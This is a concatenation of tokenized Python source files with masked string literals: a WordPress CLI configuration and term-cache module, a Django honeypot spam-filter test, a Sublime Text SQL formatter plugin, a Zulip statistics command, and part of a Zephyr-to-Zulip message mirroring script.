'<STR_LIT>' <EOL> PRE_NAME = '<STR_LIT:_>' if platform . system ( ) == '<STR_LIT>' else '<STR_LIT:.>' <EOL> INI_FILE = PRE_NAME + '<STR_LIT>' <EOL> CACHE_FILE = PRE_NAME + '<STR_LIT>' <EOL> ARTICLE_TYPES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , conffile ) : <EOL> self . conffile = conffile <EOL> self . ini = configparser . ConfigParser ( ) <EOL> self . cache = None <EOL> def init ( self , workdir ) : <EOL> if os . path . exists ( self . conffile ) : <EOL> self . read_from_file ( ) <EOL> return True <EOL> tplstr = read_file ( resource_filename ( '<STR_LIT>' , Conf . TPL_FILE ) ) <EOL> inistr = Template ( tplstr ) . substitute ( { <EOL> '<STR_LIT>' : Conf . CACHE_FILE , <EOL> '<STR_LIT>' : workdir , <EOL> } ) <EOL> self . save_to_file ( inistr ) <EOL> self . read_from_file ( ) <EOL> slog . info ( '<STR_LIT>' % self . conffile ) <EOL> return False <EOL> def init_cache ( self , site_name ) : <EOL> self . __site_section = site_name <EOL> self . cache = TermCache ( self . get_site ( '<STR_LIT>' ) ) <EOL> self . cache . init ( ) <EOL> def __missing__ ( self , key ) : <EOL> return None <EOL> def __getattr__ ( self , name ) : <EOL> return self . ini [ name ] <EOL> def get ( self , section , option ) : <EOL> return self . ini . get ( section , option , raw = True , fallback = None ) <EOL> def get_site ( self , option ) : <EOL> return self . get ( self . __site_section , option ) <EOL> def get_user ( self ) : <EOL> return self . get_site ( '<STR_LIT:user>' ) <EOL> def get_password ( self ) : <EOL> return self . get_site ( '<STR_LIT:password>' ) <EOL> def get_url ( self , only_site = False ) : <EOL> url = self . get_site ( '<STR_LIT:url>' ) <EOL> site = None <EOL> if url . endswith ( '<STR_LIT>' ) : <EOL> site = url [ : - <NUM_LIT:11> ] <EOL> elif url . endswith ( '<STR_LIT:/>' ) : <EOL> site = url [ : - <NUM_LIT:1> ] <EOL> url = url + '<STR_LIT>' <EOL> else : <EOL> site = url <EOL> url = url + '<STR_LIT>' <EOL> if only_site : <EOL> return site <EOL> return url <EOL> def save_to_file ( self , inistr ) : <EOL> write_file ( self . conffile , inistr ) <EOL> def read_from_file ( self ) : <EOL> self . ini . read ( self . conffile ) <EOL> def is_article ( self , posttype ) : <EOL> return posttype in Conf . ARTICLE_TYPES <EOL> def get_draft ( self , name ) : <EOL> """<STR_LIT>""" <EOL> draftname = ( self . get_site ( '<STR_LIT>' ) % str ( name ) ) + self . get_site ( '<STR_LIT>' ) <EOL> return self . get_work_path ( '<STR_LIT>' , draftname ) , draftname <EOL> def get_new_draft ( self , name = None ) : <EOL> draftdir = self . get_work_path ( '<STR_LIT>' ) <EOL> draftnames = list ( list_dir ( draftdir ) ) <EOL> draftfile , draftname = None , None <EOL> if name : <EOL> draftfile , draftname = self . get_draft ( name ) <EOL> if draftname in draftnames : <EOL> raise WPError ( '<STR_LIT>' % <EOL> draftname ) <EOL> else : <EOL> name = <NUM_LIT:1> <EOL> draftfile , draftname = self . get_draft ( name ) <EOL> while os . path . exists ( draftfile ) : <EOL> name += <NUM_LIT:1> <EOL> draftfile , draftname = self . get_draft ( name ) <EOL> return draftfile , draftname <EOL> def get_article ( self , name , posttype ) : <EOL> postname = name + self . get_site ( '<STR_LIT>' ) <EOL> if self . is_article ( posttype ) : <EOL> return self . get_work_path ( posttype , postname ) , postname <EOL> return None , None <EOL> def get_path ( self , name , * path ) : <EOL> workdir = os . path . join ( self . get_site ( '<STR_LIT>' ) , name ) <EOL> if path : <EOL> return os . path . abspath ( os . path . join ( workdir , * path ) ) <EOL> return workdir <EOL> def get_work_path ( self , dirname , * path ) : <EOL> workpath = self . get_path ( self . get_site ( dirname ) ) <EOL> if not os . path . exists ( workpath ) : <EOL> os . makedirs ( workpath ) <EOL> if path : <EOL> return os . path . join ( workpath , * path ) <EOL> return workpath <EOL> def get_mdfiles ( self , posttype ) : <EOL> workpath = self . get_work_path ( posttype ) <EOL> for afile in os . listdir ( workpath ) : <EOL> if afile . endswith ( self . get_site ( '<STR_LIT>' ) ) : <EOL> name = afile . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> filepath = os . path . join ( workpath , afile ) <EOL> yield ( posttype , name , filepath ) <EOL> class Action ( object ) : <EOL> def __init__ ( self , gconf , gtermcache , gargs , gparser ) : <EOL> self . conf = gconf <EOL> self . conf . site = gargs . site <EOL> self . cache = gtermcache <EOL> self . args = gargs <EOL> self . parser = gparser <EOL> self . _wp = None <EOL> def get_postid ( self , as_list = False ) : <EOL> if not self . args . query : <EOL> return None <EOL> if as_list : <EOL> postids = [ ] <EOL> for postid in self . args . query : <EOL> match = re . match ( r'<STR_LIT>' , postid ) <EOL> if match : <EOL> a = int ( match . group ( <NUM_LIT:1> ) ) <EOL> b = int ( match . group ( <NUM_LIT:2> ) ) <EOL> for i in range ( a , b + <NUM_LIT:1> ) : <EOL> postids . append ( str ( i ) ) <EOL> else : <EOL> postids . append ( postid ) <EOL> return postids <EOL> return self . args . query [ <NUM_LIT:0> ] <EOL> def get_dict_from_query ( self , query ) : <EOL> if query : <EOL> d = { } <EOL> for v in query : <EOL> value = v . split ( '<STR_LIT:=>' ) <EOL> d [ value [ <NUM_LIT:0> ] ] = value [ <NUM_LIT:1> ] <EOL> return d <EOL> return None <EOL> def get_term_query ( self ) : <EOL> typ = self . args . type <EOL> q = self . args . query <EOL> query = [ ] <EOL> if typ == '<STR_LIT>' : <EOL> query = q <EOL> else : <EOL> if typ == '<STR_LIT>' : <EOL> typ = '<STR_LIT>' <EOL> query . append ( typ ) <EOL> if q and len ( q ) > <NUM_LIT:0> : <EOL> query . append ( q [ <NUM_LIT:0> ] ) <EOL> return query <EOL> def get_terms_from_wp ( self , query , force = False ) : <EOL> if not query or len ( query ) == <NUM_LIT:0> : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return None <EOL> taxname = query [ <NUM_LIT:0> ] <EOL> slug = query [ <NUM_LIT:1> ] if len ( query ) > <NUM_LIT:1> else None <EOL> terms = self . cache [ taxname ] <EOL> if not terms or force : <EOL> results = self . wpcall ( GetTerms ( taxname ) ) <EOL> if results : <EOL> self . cache . save_terms ( results , taxname ) <EOL> if terms and slug : <EOL> return terms [ slug ] <EOL> return terms <EOL> def print_result ( self , result ) : <EOL> if isinstance ( result , WordPressTerm ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , result . group , <EOL> result . taxonomy_id , result . name , result . slug , <EOL> result . parent , result . count ) <EOL> elif isinstance ( result , WordPressPost ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , str ( result . date ) , str ( result . date_modified ) , <EOL> result . slug , result . title , <EOL> result . post_status , result . post_type ) <EOL> elif isinstance ( result , WordPressMedia ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , result . parent , result . title , <EOL> result . description , result . caption , str ( result . date_created ) , <EOL> result . link , <EOL> result . thumbnail , result . metadata ) <EOL> else : <EOL> slog . info ( result ) <EOL> def print_results ( self , results ) : <EOL> if isinstance ( results , list ) : <EOL> for result in results : <EOL> self . print_result ( result ) <EOL> elif isinstance ( results , dict ) : <EOL> for k , v in results . items ( ) : <EOL> slog . info ( '<STR_LIT>' % ( k , str ( v ) ) ) <EOL> else : <EOL> self . print_result ( results ) <EOL> def get_datetime ( self , datestring ) : <EOL> dt = datetime . strptime ( datestring , '<STR_LIT>' ) <EOL> return dt - timedelta ( hours = <NUM_LIT:8> ) <EOL> def wpcall ( self , method ) : <EOL> if not self . _wp : <EOL> self . _wp = Client ( self . conf . get_url ( ) , <EOL> self . conf . get_user ( ) , <EOL> self . conf . get_password ( ) ) <EOL> try : <EOL> results = self . _wp . call ( method ) <EOL> except InvalidCredentialsError as e : <EOL> slog . error ( e ) <EOL> return None <EOL> except Fault as e : <EOL> slog . error ( e ) <EOL> return None <EOL> return results <EOL> def go ( self ) : <EOL> pass <EOL> def build ( self ) : <EOL> if self . args . type : <EOL> self . go ( ) <EOL> elif self . parser : <EOL> self . parser . print_help ( ) <EOL> class TermCache ( PYConf ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filepath ) : <EOL> self . cachefile = filepath <EOL> def init ( self ) : <EOL> if os . path . exists ( self . cachefile ) : <EOL> super ( ) . read_from_file ( self . cachefile ) <EOL> def save_to_file ( self ) : <EOL> super ( ) . save_to_file ( self . cachefile ) <EOL> def save_terms ( self , terms , taxname ) : <EOL> termdict = PYConf ( ) <EOL> for term in terms : <EOL> self . save_term ( term , taxname , termdict ) <EOL> self [ taxname ] = termdict <EOL> self . save_to_file ( ) <EOL> def save_term ( self , term , taxname , termdict = None ) : <EOL> if termdict == None : <EOL> termdict = self [ taxname ] <EOL> if termdict == None : <EOL> termdict = PYConf ( ) <EOL> self [ taxname ] = termdict <EOL> termdict [ term . slug ] = PYConf ( { <EOL> '<STR_LIT:id>' : term . id , <EOL> '<STR_LIT>' : term . group , <EOL> '<STR_LIT>' : term . taxonomy , <EOL> '<STR_LIT>' : term . taxonomy_id , <EOL> '<STR_LIT:name>' : term . name , <EOL> '<STR_LIT>' : term . slug , <EOL> '<STR_LIT:description>' : term . description , <EOL> '<STR_LIT>' : term . parent , <EOL> '<STR_LIT:count>' : term . count , <EOL> } ) <EOL> def get_term ( self , taxname , slug ) : <EOL> if not self [ taxname ] : <EOL> return None <EOL> if not self [ taxname ] [ slug ] : <EOL> return None <EOL> termdict = self [ taxname ] [ slug ] <EOL> term = WordPressTerm ( ) <EOL> term . id = termdict [ '<STR_LIT:id>' ] <EOL> term . group = termdict [ '<STR_LIT>' ] <EOL> term . taxonomy = termdict [ '<STR_LIT>' ] <EOL> term . taxonomy_id = termdict [ '<STR_LIT>' ] <EOL> term . name = termdict [ '<STR_LIT:name>' ] <EOL> term . slug = termdict [ '<STR_LIT>' ] <EOL> term . description = termdict [ '<STR_LIT:description>' ] <EOL> term . parent = termdict [ '<STR_LIT>' ] <EOL> term . count = termdict [ '<STR_LIT:count>' ] <EOL> return term <EOL> def get_terms_from_meta ( self , categories , tags ) : <EOL> terms = [ ] <EOL> if categories : <EOL> for cat in categories : <EOL> term = self . get_term ( '<STR_LIT>' , cat ) <EOL> if not term : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % cat ) <EOL> return None <EOL> terms . append ( term ) <EOL> if tags : <EOL> for tag in tags : <EOL> term = self . get_term ( '<STR_LIT>' , tag ) <EOL> if not term : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % tag ) <EOL> return None <EOL> terms . append ( term ) <EOL> return terms </s>
<s> from __future__ import unicode_literals <EOL> """<STR_LIT>""" <EOL> import unittest <EOL> from django . conf import settings <EOL> try : <EOL> import honeypot <EOL> except ImportError : <EOL> honeypot = None <EOL> from envelope . spam_filters import check_honeypot <EOL> class FakeForm ( object ) : <EOL> pass <EOL> class FakeRequest ( object ) : <EOL> def __init__ ( self ) : <EOL> self . method = '<STR_LIT:POST>' <EOL> self . POST = { } <EOL> class CheckHoneypotTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . form = FakeForm ( ) <EOL> self . request = FakeRequest ( ) <EOL> self . honeypot = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_empty_honeypot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . POST [ self . honeypot ] = '<STR_LIT>' <EOL> self . assertTrue ( check_honeypot ( self . request , self . form ) ) <EOL> @ unittest . skipIf ( honeypot is None , "<STR_LIT>" ) <EOL> def test_filled_honeypot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . POST [ self . honeypot ] = '<STR_LIT>' <EOL> self . assertFalse ( check_honeypot ( self . request , self . form ) ) </s>
<s> import sublime , sublime_plugin <EOL> import sys <EOL> import os <EOL> sys . path . append ( os . path . dirname ( __file__ ) ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> import sqlparse3 as sqlparse <EOL> else : <EOL> import sqlparse2 as sqlparse <EOL> settings = sublime . load_settings ( '<STR_LIT>' ) <EOL> def plugin_loaded ( ) : <EOL> global settings <EOL> settings = sublime . load_settings ( '<STR_LIT>' ) <EOL> class SqlBeautifierCommand ( sublime_plugin . TextCommand ) : <EOL> def format_sql ( self , raw_sql ) : <EOL> try : <EOL> formatted_sql = sqlparse . format ( raw_sql , <EOL> keyword_case = settings . get ( "<STR_LIT>" ) , <EOL> identifier_case = settings . get ( "<STR_LIT>" ) , <EOL> strip_comments = settings . get ( "<STR_LIT>" ) , <EOL> indent_tabs = settings . get ( "<STR_LIT>" ) , <EOL> indent_width = settings . get ( "<STR_LIT>" ) , <EOL> reindent = settings . get ( "<STR_LIT>" ) <EOL> ) <EOL> if self . view . settings ( ) . get ( '<STR_LIT>' ) : <EOL> formatted_sql += "<STR_LIT:\n>" <EOL> return formatted_sql <EOL> except Exception as e : <EOL> print ( e ) <EOL> return None <EOL> def replace_region_with_formatted_sql ( self , edit , region ) : <EOL> selected_text = self . view . substr ( region ) <EOL> foramtted_text = self . format_sql ( selected_text ) <EOL> self . view . replace ( edit , region , foramtted_text ) <EOL> def run ( self , edit ) : <EOL> window = self . view . window ( ) <EOL> view = window . active_view ( ) <EOL> for region in self . view . sel ( ) : <EOL> if region . empty ( ) : <EOL> selection = sublime . Region ( <NUM_LIT:0> , self . view . size ( ) ) <EOL> self . replace_region_with_formatted_sql ( edit , selection ) <EOL> self . view . set_syntax_file ( "<STR_LIT>" ) <EOL> else : <EOL> self . replace_region_with_formatted_sql ( edit , region ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> import datetime <EOL> import pytz <EOL> from optparse import make_option <EOL> from django . core . management . base import BaseCommand <EOL> from zerver . lib . statistics import activity_averages_during_day <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( make_option ( '<STR_LIT>' , default = None , action = '<STR_LIT:store>' , <EOL> help = "<STR_LIT>" ) , ) <EOL> def handle ( self , * args , ** options ) : <EOL> if options [ "<STR_LIT:date>" ] is None : <EOL> date = datetime . datetime . now ( ) - datetime . timedelta ( days = <NUM_LIT:1> ) <EOL> else : <EOL> date = datetime . datetime . strptime ( options [ "<STR_LIT:date>" ] , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , date ) <EOL> print ( activity_averages_during_day ( date ) ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import <EOL> from typing import Any , List <EOL> import sys <EOL> from six . moves import map <EOL> from six . moves import range <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> import json as simplejson <EOL> import re <EOL> import time <EOL> import subprocess <EOL> import optparse <EOL> import os <EOL> import datetime <EOL> import textwrap <EOL> import signal <EOL> import logging <EOL> import hashlib <EOL> import tempfile <EOL> import select <EOL> DEFAULT_SITE = "<STR_LIT>" <EOL> class States ( object ) : <EOL> Startup , ZulipToZephyr , ZephyrToZulip , ChildSending = list ( range ( <NUM_LIT:4> ) ) <EOL> CURRENT_STATE = States . Startup <EOL> logger = None <EOL> def to_zulip_username ( zephyr_username ) : <EOL> if "<STR_LIT:@>" in zephyr_username : <EOL> ( user , realm ) = zephyr_username . split ( "<STR_LIT:@>" ) <EOL> else : <EOL> ( user , realm ) = ( zephyr_username , "<STR_LIT>" ) <EOL> if realm . upper ( ) == "<STR_LIT>" : <EOL> if user . lower ( ) == '<STR_LIT>' : <EOL> user = '<STR_LIT>' <EOL> return user . lower ( ) + "<STR_LIT>" <EOL> return user . lower ( ) + "<STR_LIT:|>" + realm . upper ( ) + "<STR_LIT>" <EOL> def to_zephyr_username ( zulip_username ) : <EOL> ( user , realm ) = zulip_username . split ( "<STR_LIT:@>" ) <EOL> if "<STR_LIT:|>" not in user : <EOL> if user . lower ( ) == '<STR_LIT>' : <EOL> user = '<STR_LIT>' <EOL> return user . lower ( ) + "<STR_LIT>" <EOL> match_user = re . match ( r'<STR_LIT>' , user ) <EOL> if not match_user : <EOL> raise Exception ( "<STR_LIT>" % ( zulip_username , ) ) <EOL> return match_user . group ( <NUM_LIT:1> ) . lower ( ) + "<STR_LIT:@>" + match_user . group ( <NUM_LIT:2> ) . upper ( ) <EOL> def different_paragraph ( line , next_line ) : <EOL> words = next_line . split ( ) <EOL> return ( len ( line + "<STR_LIT:U+0020>" + words [ <NUM_LIT:0> ] ) < len ( next_line ) * <NUM_LIT> or <EOL> len ( line + "<STR_LIT:U+0020>" + words [ <NUM_LIT:0> ] ) < <NUM_LIT:50> or <EOL> len ( line ) < len ( words [ <NUM_LIT:0> ] ) ) <EOL> def unwrap_lines ( body ) : <EOL> lines = body . split ( "<STR_LIT:\n>" ) <EOL> result = "<STR_LIT>" <EOL> previous_line = lines [ <NUM_LIT:0> ] <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> line = line . rstrip ( ) <EOL> if ( re . match ( r'<STR_LIT>' , line , flags = re . UNICODE ) <EOL> and re . match ( r'<STR_LIT>' , previous_line , flags = re . UNICODE ) ) : <EOL> result += previous_line + "<STR_LIT:\n>" <EOL> elif ( line == "<STR_LIT>" or <EOL> previous_line == "<STR_LIT>" or <EOL> re . match ( r'<STR_LIT>' , line , flags = re . UNICODE ) or <EOL> different_paragraph ( previous_line , line ) ) : <EOL> result += previous_line + "<STR_LIT>" <EOL> else : <EOL> result += previous_line + "<STR_LIT:U+0020>" <EOL> previous_line = line <EOL> result += previous_line <EOL> return result <EOL> def send_zulip ( zeph ) : <EOL> message = { } <EOL> if options . forward_class_messages : <EOL> message [ "<STR_LIT>" ] = "<STR_LIT:yes>" <EOL> message [ '<STR_LIT:type>' ] = zeph [ '<STR_LIT:type>' ] <EOL> message [ '<STR_LIT:time>' ] = zeph [ '<STR_LIT:time>' ] <EOL> message [ '<STR_LIT>' ] = to_zulip_username ( zeph [ '<STR_LIT>' ] ) <EOL> if "<STR_LIT>" in zeph : <EOL> message [ "<STR_LIT>" ] = zeph [ "<STR_LIT>" ] [ : <NUM_LIT> ] <EOL> if zeph [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> if zeph [ "<STR_LIT>" ] == "<STR_LIT:message>" : <EOL> message [ '<STR_LIT:to>' ] = zeph [ '<STR_LIT>' ] . lower ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" % ( zeph [ '<STR_LIT>' ] , ) <EOL> elif zeph [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> message [ '<STR_LIT:to>' ] = zeph [ '<STR_LIT>' ] . lower ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" % ( zeph [ '<STR_LIT>' ] , ) <EOL> else : <EOL> message [ "<STR_LIT:to>" ] = zeph [ "<STR_LIT>" ] <EOL> else : <EOL> message [ "<STR_LIT:to>" ] = zeph [ "<STR_LIT>" ] <EOL> message [ '<STR_LIT:content>' ] = unwrap_lines ( zeph [ '<STR_LIT:content>' ] ) <EOL> if options . test_mode and options . site == DEFAULT_SITE : <EOL> logger . debug ( "<STR_LIT>" % ( str ( message ) , ) ) <EOL> return { '<STR_LIT:result>' : "<STR_LIT:success>" } <EOL> return zulip_client . send_message ( message ) <EOL> def send_error_zulip ( error_msg ) : <EOL> message = { "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : zulip_account_email , <EOL> "<STR_LIT:to>" : zulip_account_email , <EOL> "<STR_LIT:content>" : error_msg , <EOL> } <EOL> zulip_client . send_message ( message ) <EOL> current_zephyr_subs = set ( ) <EOL> def zephyr_bulk_subscribe ( subs ) : <EOL> try : <EOL> zephyr . _z . subAll ( subs ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> logger . warning ( "<STR_LIT>" % ( [ cls for cls , instance , recipient in subs ] , ) ) <EOL> return <EOL> try : <EOL> actual_zephyr_subs = [ cls for ( cls , _ , _ ) in zephyr . _z . getSubscriptions ( ) ] <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> return <EOL> for ( cls , instance , recipient ) in subs : <EOL> if cls not in actual_zephyr_subs : <EOL> logger . error ( "<STR_LIT>" % ( cls , ) ) <EOL> try : <EOL> zephyr . _z . sub ( cls , instance , recipient ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> current_zephyr_subs . add ( cls ) <EOL> def update_subscriptions ( ) : <EOL> try : <EOL> f = open ( options . stream_file_path , "<STR_LIT:r>" ) <EOL> public_streams = simplejson . loads ( f . read ( ) ) <EOL> f . close ( ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> return <EOL> classes_to_subscribe = set ( ) <EOL> for stream in public_streams : <EOL> zephyr_class = stream . encode ( "<STR_LIT:utf-8>" ) <EOL> if ( options . shard is not None and <EOL> not hashlib . sha1 ( zephyr_class ) . hexdigest ( ) . startswith ( options . shard ) ) : <EOL> continue <EOL> if zephyr_class in current_zephyr_subs : <EOL> continue <EOL> classes_to_subscribe . add ( ( zephyr_class , "<STR_LIT:*>" , "<STR_LIT:*>" ) ) <EOL> if len ( classes_to_subscribe ) > <NUM_LIT:0> : <EOL> zephyr_bulk_subscribe ( list ( classes_to_subscribe ) ) <EOL> def maybe_kill_child ( ) : <EOL> try : <EOL> if child_pid is not None : <EOL> os . kill ( child_pid , signal . SIGTERM ) <EOL> except OSError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def maybe_restart_mirroring_script ( ) : <EOL> if os . stat ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) ) . st_mtime > start_time or ( ( options . user == "<STR_LIT>" or options . user == "<STR_LIT>" ) and <EOL> os . stat ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) ) . st_mtime > start_time ) : <EOL> logger . warning ( "<STR_LIT>" ) <EOL> logger . warning ( "<STR_LIT>" ) <EOL> maybe_kill_child ( ) <EOL> try : <EOL> zephyr . _z . cancelSubs ( ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> os . execvp ( os . path . join ( options . root_path , "<STR_LIT>" , "<STR_LIT>" ) , sys . argv ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def process_loop ( log ) : <EOL> restart_check_count = <NUM_LIT:0> <EOL> last_check_time = time . time ( ) <EOL> while True : <EOL> select . select ( [ zephyr . _z . getFD ( ) ] , [ ] , [ ] , <NUM_LIT:15> ) <EOL> try : <EOL> while True : <EOL> notice = zephyr . receive ( block = False ) <EOL> if notice is None : <EOL> break <EOL> try : <EOL> process_notice ( notice , log ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> continue <EOL> if time . time ( ) - last_check_time > <NUM_LIT:15> : <EOL> last_check_time = time . time ( ) <EOL> try : <EOL> maybe_restart_mirroring_script ( ) <EOL> if restart_check_count > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" ) <EOL> restart_check_count = <NUM_LIT:0> <EOL> except Exception : <EOL> if restart_check_count < <NUM_LIT:5> : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> restart_check_count += <NUM_LIT:1> <EOL> if options . forward_class_messages : <EOL> try : <EOL> update_subscriptions ( ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def parse_zephyr_body ( zephyr_data ) : <EOL> try : <EOL> ( zsig , body ) = zephyr_data . split ( "<STR_LIT:\x00>" , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> ( zsig , body ) = ( "<STR_LIT>" , zephyr_data ) <EOL> return ( zsig , body ) <EOL> def parse_crypt_table ( zephyr_class , instance ) : <EOL> try : <EOL> crypt_table = open ( os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" ) ) <EOL> except IOError : <EOL> return None <EOL> for line in crypt_table . readlines ( ) : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> match = re . match ( "<STR_LIT>" , line ) <EOL> if match is None : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> continue <EOL> groups = match . groupdict ( ) <EOL> if groups [ '<STR_LIT:class>' ] . lower ( ) == zephyr_class and '<STR_LIT>' in groups and groups . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> return groups [ "<STR_LIT>" ] <EOL> return None <EOL> def decrypt_zephyr ( zephyr_class , instance , body ) : <EOL> keypath = parse_crypt_table ( zephyr_class , instance ) <EOL> if keypath is None : <EOL> return body <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_DFL ) <EOL> p = subprocess . Popen ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> keypath ] , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> decrypted , _ = p . communicate ( input = body ) <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_IGN ) <EOL> return decrypted <EOL> def process_notice ( notice , log ) : <EOL> ( zsig , body ) = parse_zephyr_body ( notice . message ) <EOL> is_personal = False <EOL> is_huddle = False <EOL> if notice . opcode == "<STR_LIT>" : <EOL> return <EOL> zephyr_class = notice . cls . lower ( ) <EOL> if zephyr_class == options . nagios_class : <EOL> with open ( options . nagios_path , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT>" ) <EOL> return <EOL> if notice . recipient != "<STR_LIT>" : <EOL> is_personal = True <EOL> if is_personal and not options . forward_personals : <EOL> return <EOL> if ( zephyr_class not in current_zephyr_subs ) and not is_personal : <EOL> logger . debug ( "<STR_LIT>" % <EOL> ( zephyr_class , notice . instance , is_personal ) ) <EOL> return <EOL> if notice . format . startswith ( "<STR_LIT>" ) or notice . format . endswith ( "<STR_LIT>" ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return <EOL> if ( zephyr_class == "<STR_LIT>" and notice . instance . lower ( ) == "<STR_LIT>" and is_personal and <EOL> not options . forward_mail_zephyrs ) : <EOL> return <EOL> if is_personal : <EOL> if body . startswith ( "<STR_LIT>" ) : <EOL> is_huddle = True <EOL> huddle_recipients = [ to_zulip_username ( x . strip ( ) ) for x in <EOL> body . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:0> ] [ <NUM_LIT:4> : ] . split ( ) ] <EOL> if notice . sender not in huddle_recipients : <EOL> huddle_recipients . append ( to_zulip_username ( notice . sender ) ) <EOL> body = body . split ( "<STR_LIT:\n>" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> if options . forward_class_messages and notice . opcode . lower ( ) == "<STR_LIT>" : <EOL> body = decrypt_zephyr ( zephyr_class , notice . instance . lower ( ) , body ) <EOL> zeph = { '<STR_LIT:time>' : str ( notice . time ) , <EOL> '<STR_LIT>' : notice . sender , <EOL> '<STR_LIT>' : zsig , <EOL> '<STR_LIT:content>' : body } <EOL> if is_huddle : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = huddle_recipients <EOL> elif is_personal : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = to_zulip_username ( notice . recipient ) <EOL> else : <EOL> zeph [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> zeph [ '<STR_LIT>' ] = zephyr_class <EOL> if notice . instance . strip ( ) != "<STR_LIT>" : <EOL> zeph [ '<STR_LIT>' ] = notice . instance <EOL> else : <EOL> zeph [ "<STR_LIT>" ] = '<STR_LIT>' % ( notice . instance , ) <EOL> if is_personal : <EOL> if notice . cls . lower ( ) != "<STR_LIT:message>" and notice . instance . lower != "<STR_LIT>" : <EOL> heading = "<STR_LIT>" % ( notice . cls , notice . instance ) <EOL> elif notice . cls . lower ( ) != "<STR_LIT:message>" : <EOL> heading = "<STR_LIT>" % ( notice . cls , ) <EOL> elif notice . instance . lower ( ) != "<STR_LIT>" : <EOL> heading = "<STR_LIT>" % ( notice . instance , ) <EOL> else : <EOL> heading = "<STR_LIT>" <EOL> zeph [ "<STR_LIT:content>" ] = heading + zeph [ "<STR_LIT:content>" ] <EOL> zeph = decode_unicode_byte_strings ( zeph ) <EOL> logger . info ( "<STR_LIT>" % <EOL> ( zephyr_class , notice . instance , notice . sender ) ) <EOL> if log is not None : <EOL> log . write ( simplejson . dumps ( zeph ) + '<STR_LIT:\n>' ) <EOL> log . flush ( ) <EOL> if os . fork ( ) == <NUM_LIT:0> : <EOL> global CURRENT_STATE <EOL> CURRENT_STATE = States . ChildSending <EOL> try : <EOL> res = send_zulip ( zeph ) <EOL> if res . get ( "<STR_LIT:result>" ) != "<STR_LIT:success>" : <EOL> logger . error ( "<STR_LIT>" % ( zeph , res ) ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> def decode_unicode_byte_strings ( zeph ) : <EOL> for field in zeph . keys ( ) : <EOL> if isinstance ( zeph [ field ] , str ) : <EOL> try : <EOL> decoded = zeph [ field ] . decode ( "<STR_LIT:utf-8>" ) 